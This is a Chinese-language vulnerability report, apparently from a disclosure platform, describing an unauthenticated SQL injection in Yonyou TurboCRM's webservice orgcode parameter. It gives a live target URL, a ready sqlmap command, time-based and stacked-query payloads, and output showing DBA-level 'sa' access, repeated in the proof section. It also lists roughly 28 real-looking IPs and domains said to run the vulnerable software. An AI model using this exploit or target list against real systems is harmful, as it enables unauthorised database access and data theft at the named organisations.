用友CRM注入漏洞（无需登录通杀所有版本）

### 简要描述： 用友CRM注入漏洞，无需登录，通杀所有版本 ### 详细说明： 漏洞url： ``` http://220.178.27.116:8001/webservice/service.php?class=WS_System&orgcode=1 ``` 使用sqlmap进行注入。 ``` sqlmap.py -u "http://220.178.27.116:8001/webservice/service.php?class=WS_System&orgcode=1" --current-user --current-db --is-dba ``` ``` sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: orgcode Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: class=WS_System&orgcode=1'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: class=WS_System&orgcode=1' WAITFOR DELAY '0:0:5'-- --- ``` ``` current user: 'sa' current database: 'turbocrm70' current user is DBA: True ``` 整理出了以下使用这套crm的网站，title:用友TurboCRM ``` 182.135.191.86 111.40.0.242:9091 222.171.32.36:9091 219.90.119.35:8081 180.168.98.94:8088 prm.yonyou.com www.kdlian.com:8001 prm.chanjet.com qinyuancrm.com kfdq369.gicp.net 220.113.5.194 218.84.134.162:8088 turbocrm.yofc.com crm.elfa.com.cn crm.pearmain.cn nc.shineroad.com crm.westernpower.cn crm7.abgroup.cn crm.transn.net zh4433.vicp.net 218.108.86.226 crm.yiwenkeji.com:8080 218.95.66.88:9036 crm.digisystem.com.cn:8080 crm.shineroad.com crm.siweidg.com 222.41.174.190:8088 ``` ### 漏洞证明： ``` sqlmap.py -u "http://220.178.27.116:8001/webservice/service.php?class=WS_System&orgcode=1" --current-user --current-db --is-dba ``` ``` sqlmap identified the following injection points with a total of 0 HTTP(s) reque sts: --- Place: GET Parameter: orgcode Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: class=WS_System&orgcode=1'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: class=WS_System&orgcode=1' WAITFOR DELAY '0:0:5'-- --- ``` ``` current user: 'sa' current database: 'turbocrm70' current user is DBA: True ``` [<img src="https://images.seebug.org/upload/201407/081033445de7565cf159b349f5f8753c547579c1.png" alt="t0132dce2159f711de2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201407/081033445de7565cf159b349f5f8753c547579c1.png)